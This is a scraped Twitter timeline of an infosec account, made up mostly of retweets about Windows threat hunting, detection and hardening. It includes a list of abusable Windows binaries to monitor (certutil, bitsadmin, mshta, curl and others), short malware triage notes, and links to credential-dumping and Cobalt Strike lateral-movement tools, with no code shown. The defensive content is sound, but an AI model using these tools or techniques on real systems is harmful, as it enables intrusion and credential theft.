Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @rimpq
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @rimpq
-
Prikvačeni tweet
Account Logon Flow / Process (#Windows) v0.1
[PDF]:https://speakerdeck.com/rimpq/account-logon-flow-windows …
[DIRECT]:https://speakerd.s3.amazonaws.com/presentations/1c1196d9f4d647b7bcfb9c25cdc28388/windows_account_logon_flow_v0.1.pdf …
...for self understanding logon flow / process in windows system. Special thanks to Andrei Miroshnikov
"Find Evil – Know Normal" #SANS#threathunting#blueteampic.twitter.com/jVuLNRpAZh
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Need a
#ZeroTrust Reference Architecture? Check out this one showing how@Microsoft technology enables this strategy/access model. Slide 14 of CISO Workshop Module 3@ajohnsocyber@MalwareJake@_sarahyo@RavivTamir@JohnLaTwC#Cybersecurity https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/ciso-workshop-module-3 …pic.twitter.com/t2eChLzW8r
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
#PingCastle 2.8.0.0 released !!! https://pingcastle.com/download/ 4 clicks and 2 <enter>, that what's between you and the hard truth of your AD security. Example of report: https://pingcastle.com/PingCastleFiles/ad_hc_test.mysmartlogon.com.html … github: https://github.com/vletoux/pingcastle … Changelog: https://raw.githubusercontent.com/vletoux/pingcastle/2.8.0.0/changelog.txt …pic.twitter.com/1oQXuIJcdiHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Ring3API proslijedio/la je Tweet
Join me and
@CptJesus on Tuesday, February 11th as we unveil#BloodHound 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards): https://specterops.zoom.us/webinar/register/WN_Ak7pi_zxSM28HBIl5RIVWw …pic.twitter.com/pP4BxRE0tN
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Like
@graylog2 and@TheHive_Project?! Then you’ll love our write up on how to integrate them. http://blog.reconinfosec.com/integrating-graylog-with-thehive/ …#infosec#DFIRHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Some essential process execution/cmd lines to monitor for initial access/persist. powershell cmd rundll32 control wscript javaw csc regsvr32 reg certutil bitsadmin schtasks wmic eqnedt32 msiexec cmstp mshta hh curl installutil regsvcs/regasm at msbuild sc cscript msxsl runonce
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
i never noticed, some agenttesli install a root cert? https://app.any.run/tasks/97f40768-ac7c-4e07-bc2c-c6838bb9789c …pic.twitter.com/HSz6Rtg4f5
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Samples are packed with Themida
1.exe --> NuclearBot
9.exe --> Infostealer
4.exe --> downloads tor.exe and 2 AutoIt files (32.exe and 64.exe), possibly miner (I am still looking into it, process graph below)
#NuclearBot#Infostealer#Themidapic.twitter.com/gOmq5i3HOC
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Yearly reminder that https://ntdiff.github.io/ by
@PetrBenes is awesome sauce
pic.twitter.com/kp0JmavIx4
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Cobalt Strike kit for Lateral Movementhttps://github.com/0xthirteen/MoveKit …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Was testing out Elastic 7.5.2. Not sure when a change was made to the behavior of fields that consist of arrays of keywords (like process.args)... This change 'breaks' a lot of the anticipated behaviors from previous versions for fields like process.args.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
I've spent a whole day on Sigma Focus: Facilitate contributions - New Rule Creation Guide https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide … - New colorised test output - New test cases - Rule cleanup (title, date, ids) https://github.com/Neo23x0/sigma/pull/604 … Next step: How-to guide for pull requestspic.twitter.com/5Iy4NSmiEo
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Endpoint Isolation with the
#Windows Firewallhttps://medium.com/@cryps1s/endpoint-isolation-with-the-windows-firewall-462a795f4cfb …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Uncovering Mimikatz ‘msv’ and collecting credentials through PyKDhttps://www.matteomalvica.com/blog/2020/01/20/mimikatz-lsass-dump-windg-pykd/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
in-memory traces of ppldump, exploiting zam64.sys vulndriver to dump lsass memory, cool stuff. sysmon will show a generic\noisy calltrace so detection chances here are low, if combined with lsass loading dbgcore.dll it may work. https://github.com/realoriginal/ppldump … https://github.com/SouhailHammou/Exploits …pic.twitter.com/rbXCtivW3M
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
Need a SOC Reference Architecture? Check out this one we put together to show how Microsoft technology integrates into a SOC. Slide 73 of Azure Security Compass - https://aka.ms/azuresecuritycompass …
@ajohnsocyber@MalwareJake@_sarahyo@RavivTamir@JohnLaTwCpic.twitter.com/hI0eT0Tu14
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
A quick post on why you shouldn't use SYSTEM Tokens when you sandbox a process. Part 1 of N (where I haven't decided how big N is). https://www.tiraniddo.dev/2020/01/dont-use-system-tokens-for-sandboxing.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je Tweet
I finally got around to publishing my Sysmon deployment method. Hope people find it useful:https://github.com/jokezone/Update-Sysmon …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ring3API proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Ring3API proslijedio/la je Tweet
1. Network segmentation 2. Host-based Firewalls 3. Windows Credential Guard/Exploit Guard 4. Applocker 5. Privilege Account Monitoring 6. EDR 7. Sandboxed Office365/Outlook 8. 2FA 9. AMSI 10. MSBuild/Powershell Monitoringhttps://twitter.com/jhencinski/status/1221819451617705984?s=20 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.